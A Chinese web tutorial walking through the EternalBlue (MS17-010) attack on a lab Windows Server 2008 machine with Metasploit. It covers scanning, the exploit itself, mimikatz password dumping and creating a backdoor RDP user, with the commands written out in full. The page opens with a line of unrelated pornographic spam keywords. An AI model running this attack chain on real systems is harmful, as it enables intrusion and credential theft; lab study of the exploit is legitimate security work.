欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

永恒之藍(lán)實(shí)戰(zhàn)教程之Mac通過(guò)Metasploit攻擊Server2008的詳細(xì)過(guò)程

 更新時(shí)間:2022年08月31日 11:24:41   作者:夜貓逐夢(mèng)  
這篇文章主要介紹了永恒之藍(lán)實(shí)戰(zhàn)教程?Mac通過(guò)Metasploit攻擊Server2008,首先準(zhǔn)備一個(gè)Server2008,主要功能是使網(wǎng)絡(luò)上的機(jī)器能夠共享計(jì)算機(jī)文件、打印機(jī)、串行端口和通訊等資源,需要的朋友可以參考下

導(dǎo)讀

準(zhǔn)備一個(gè)Server2008,通過(guò)Metasploit獲取system訪問(wèn)權(quán)限,進(jìn)入meterpreter交互界面。
通過(guò)shell命令,連通目標(biāo)機(jī)器的cmd,查看目標(biāo)系統(tǒng)信息。
然后通過(guò)mimikatz查看系統(tǒng)用戶。
最后通過(guò)run enable_rdp開(kāi)啟控制機(jī)遠(yuǎn)程桌面并創(chuàng)建用戶。

開(kāi)發(fā)環(huán)境

 版本號(hào)描述
MacOS(攻擊機(jī)器)11.5 
Windows(目標(biāo)機(jī)器)Server 2008 R2 x64 SP1 
Metasploit6.2.15-dev-1b985447c5dccba9be98ed7cef60eecf487b9ec5 
Microsoft_Remote_Desktop10.7.9 

基礎(chǔ)知識(shí)

永恒之藍(lán)

SMB(Server Message Block)又稱網(wǎng)絡(luò)文件共享系統(tǒng)(Common Internet File System,縮寫(xiě)為CIFS),一種應(yīng)用層網(wǎng)絡(luò)傳輸協(xié)議,主要功能是使網(wǎng)絡(luò)上的機(jī)器能夠共享計(jì)算機(jī)文件、打印機(jī)、串行端口和通訊等資源。它也提供經(jīng)認(rèn)證的行程間通信機(jī)能。

永恒之藍(lán)”(Eternalblue)漏洞編號(hào)MS17-010 泄露自美國(guó)國(guó)家安全局(NSA)黑客工具包

該漏洞利用工具針對(duì)TCP 445端口(Server Message Block/SMB)的文件分享協(xié)議進(jìn)行攻擊,可以獲取系統(tǒng)最高權(quán)限system

漏洞影響:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等

Metasploit

常用命令

show exploits – 查看所有可用的滲透攻擊程序代碼 
show auxiliary – 查看所有可用的輔助攻擊工具 
show options – 查看該模塊所有可用選項(xiàng) 
show payloads – 查看該模塊適用的所有載荷代碼 
show targets – 查看該模塊適用的攻擊目標(biāo)類型
search – 根據(jù)關(guān)鍵字搜索某模塊 
info – 顯示某模塊的詳細(xì)信息 
use – 進(jìn)入使用某滲透攻擊模塊 
back – 回退 
set/unset – 設(shè)置/禁用模塊中的某個(gè)參數(shù) 
setg/unsetg – 設(shè)置/禁用適用于所有模塊的全局參數(shù) 
save – 將當(dāng)前設(shè)置值保存下來(lái),以便下次啟動(dòng)MSF終端時(shí)仍可使用

meterpreter

meterpreter 是一個(gè)高級(jí)的,動(dòng)態(tài)的,可拓展的Payload,出現(xiàn)meterpreter 我們就有了shell,可以執(zhí)行非常多的命令,去操控遠(yuǎn)端設(shè)備。
執(zhí)行命令:?或者h(yuǎn)elp,顯示出可以執(zhí)行的全部命令。
我們會(huì)用到upload、run等命令。

Core Commands
=============
    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    ssl_verify                Modify the SSL certificate verification setting
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel
Stdapi: File system Commands
============================
    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory
Stdapi: Networking Commands
===========================
    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table
Stdapi: System Commands
=======================
    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    mouse          Send mouse events
    screenshare    Watch the remote user desktop in real time
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components
Stdapi: Webcam Commands
=======================
    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

準(zhǔn)備工作

虛擬機(jī)安裝Server2008

系統(tǒng)下載地址:https://msdn.itellyou.cn/

安裝:略~~~

Mac上安裝Metasploit

下載安裝:
【可忽略】官網(wǎng)地址:https://www.metasploit.com/download
【可忽略】通過(guò)官網(wǎng),只能訪問(wèn)到github的wiki頁(yè)面,wiki頁(yè)面又讓跳轉(zhuǎn)到官網(wǎng)的幫助文檔頁(yè)面:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
幫助頁(yè)面中,我們可以看到支持各種平臺(tái),其中Mac平臺(tái)是通過(guò) https://osx.metasploit.com/metasploitframework-latest.pkg下載,直接安裝即可。

初始化、運(yùn)行:

# 切換到工作目錄
cd /opt/metasploit-framework/bin/

# 一定要這么做,否則連接的數(shù)據(jù)庫(kù)一定有問(wèn)題。
./msfdb init

# 運(yùn)行Metasploit開(kāi)控臺(tái)(運(yùn)行一次會(huì)將路徑設(shè)置到環(huán)境變量中,以后就可以直接訪問(wèn)該目錄中所有命令了)
./msfconsole

Mac上安裝遠(yuǎn)程桌面客戶端Microsoft Remote Desktop

通過(guò)App Store是無(wú)法搜索到Microsoft Remote Desktop的;通過(guò)https://apps.apple.com/tw/app/microsoft-remote-desktop/id1295203466頁(yè)面跳轉(zhuǎn)到App Store,會(huì)提示地區(qū)尚不提供此App。

這里,我們通過(guò)該地址直接下載https://mac.softpedia.com/get/Utilities/Microsoft-Remote-Desktop-Connection.shtml,下載的文件名為Microsoft_Remote_Desktop_10.7.9_installer.pkg,雙擊即可安裝。

下面兩個(gè)下載地址需要登錄,有點(diǎn)麻煩

玩轉(zhuǎn)蘋(píng)果下載:https://www.ifunmac.com/?s=Microsoft+Remote+Desktop+for+Mac&x=0&y=0未來(lái)Mac下載: https://mac.orsoon.com/search/Microsoft%20Remote%20Desktop%20for%20Ma_mac_1.html

通過(guò)Metasploit,獲取靶機(jī)shell 搜索17-010相關(guān)漏洞插件

msf6 > search 17-010

使用scanner輔助驗(yàn)證插件掃描漏洞

# 選中插件
use auxiliary/scanner/smb/smb_ms17_010
# 設(shè)置目錄機(jī)器,單個(gè)ip驗(yàn)證(虛擬機(jī)中的Server2008)
set RHOSTS 192.168.1.216

# 開(kāi)始執(zhí)行漏洞掃描
run

效果如下:

ps:
show options是顯示這個(gè)插件相關(guān)的參數(shù),在Required這一欄下面是yes的表示必填參數(shù)。

ps:
參數(shù)RHOSTSTHREADS:

# RHOSTS這個(gè)參數(shù)可以設(shè)置一個(gè)目標(biāo)網(wǎng)段,進(jìn)行掃描測(cè)試
set RHOSTS 192.168.29.1/24

# 設(shè)置掃描線程,插件默認(rèn)是1,這里設(shè)置為20:
set THREADS 20

exploit獲取shell

使用exploit模塊來(lái)進(jìn)行攻擊測(cè)試

use exploit/windows/smb/ms17_010_eternalblue 
set RHOSTS 192.168.1.1
set THREADS 10
run

效果如下:

執(zhí)行命令shell即可進(jìn)入cmd命令行:

ps:
在windows命令行輸入 chcp 65001 解決中文亂碼

利用mimikatz模塊,爆破靶機(jī)賬號(hào)密碼

# 加載mimikatz
load mimikatz

# 讀取內(nèi)存中存放的賬號(hào)密碼
creds_wdigest

效果如下:

利用meterpreter模塊,開(kāi)啟控制機(jī)遠(yuǎn)程桌面并創(chuàng)建用戶

開(kāi)啟rdp

# 1,啟動(dòng)遠(yuǎn)程桌面(通過(guò)爆破出來(lái)的密碼登錄)
meterpreter > run post/windows/manage/enable_rdp 
# 2,創(chuàng)建一個(gè)新用戶來(lái)遠(yuǎn)程連接 windows 桌面
meterpreter > run post/windows/manage/enable_rdp username=root password=root@toor.com

通過(guò)Microsoft Remote Desktop遠(yuǎn)程連接Server2008

ps:
kali連接windows桌面 rdesktop 192.168.1.216

參考資料

mac下安裝Metasploit https://www.kali.org/get-kali/#kali-bare-metal

到此這篇關(guān)于永恒之藍(lán)實(shí)戰(zhàn)教程 Mac通過(guò)Metasploit攻擊Server2008的文章就介紹到這了,更多相關(guān)Metasploit攻擊Server2008內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • 三大UML建模工具Visio、Rational Rose、PowerDesign的區(qū)別比較

    三大UML建模工具Visio、Rational Rose、PowerDesign的區(qū)別比較

    UML建模工具相信大家有所了解,那么你對(duì)UML建模工具Visio 、Rational Rose、PowerDesign之間的區(qū)別和聯(lián)系是否了解,這里就像大家簡(jiǎn)單介紹一下
    2013-02-02
  • git流水線(Pipeline)導(dǎo)致分支(Branch)無(wú)法合并問(wèn)題及解決

    git流水線(Pipeline)導(dǎo)致分支(Branch)無(wú)法合并問(wèn)題及解決

    這篇文章主要介紹了git流水線(Pipeline)導(dǎo)致分支(Branch)無(wú)法合并問(wèn)題及解決方案,具有很好的參考價(jià)值,希望對(duì)大家有所幫助,如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2023-11-11
  • Win10下為VSCode配置LaTex編輯器的方法

    Win10下為VSCode配置LaTex編輯器的方法

    這篇文章主要介紹了Win10下為VSCode配置LaTex編輯器的方法,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2020-05-05
  • vscode eslint插件報(bào)錯(cuò)Parsing error: Invalid ecmaVersion問(wèn)題

    vscode eslint插件報(bào)錯(cuò)Parsing error: Invalid 

    這篇文章主要介紹了vscode eslint插件報(bào)錯(cuò)Parsing error: Invalid ecmaVersion問(wèn)題及解決方案,具有很好的參考價(jià)值,希望對(duì)大家有所幫助,如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2023-10-10
  • TCP協(xié)議詳解_動(dòng)力節(jié)點(diǎn)Java學(xué)院整理

    TCP協(xié)議詳解_動(dòng)力節(jié)點(diǎn)Java學(xué)院整理

    本文描述了TCP協(xié)議,首先簡(jiǎn)單介紹了TCP完成了一些什么功能;介紹了TCP報(bào)文格式,以及典型報(bào)文的數(shù)據(jù)格式?,F(xiàn)在通過(guò)本文給大家詳細(xì)介紹,感興趣的的朋友一起看看吧
    2017-07-07
  • Git入門(mén)【推薦】

    Git入門(mén)【推薦】

    本文主要介紹了Git入門(mén)的相關(guān)知識(shí),具有很好的參考價(jià)值。下面跟著小編一起來(lái)看下吧
    2017-03-03
  • 詳解git合并沖突解決方法

    詳解git合并沖突解決方法

    這篇文章主要介紹了詳解git合并沖突解決方法,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2020-07-07
  • php和asp利用Shell.Application來(lái)執(zhí)行程序的代碼

    php和asp利用Shell.Application來(lái)執(zhí)行程序的代碼

    關(guān)于用Shell.Application來(lái)執(zhí)行程序,在海陽(yáng)頂端asp木馬里已有示例。用的是ShellExecute 這個(gè)方法。
    2008-12-12
  • 基于webstorm卡頓問(wèn)題的2種解決方法

    基于webstorm卡頓問(wèn)題的2種解決方法

    下面小編就為大家分享一篇使用2種方法解決webstorm卡頓的問(wèn)題,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧
    2017-11-11
  • Git 教程之工作區(qū)、暫存區(qū)和版本庫(kù)詳解

    Git 教程之工作區(qū)、暫存區(qū)和版本庫(kù)詳解

    本文主要介紹Git 工作區(qū)、暫存區(qū)和版本庫(kù)的知識(shí),這里整理了詳細(xì)的資料,有需要的小伙伴可以參考下
    2016-09-09

最新評(píng)論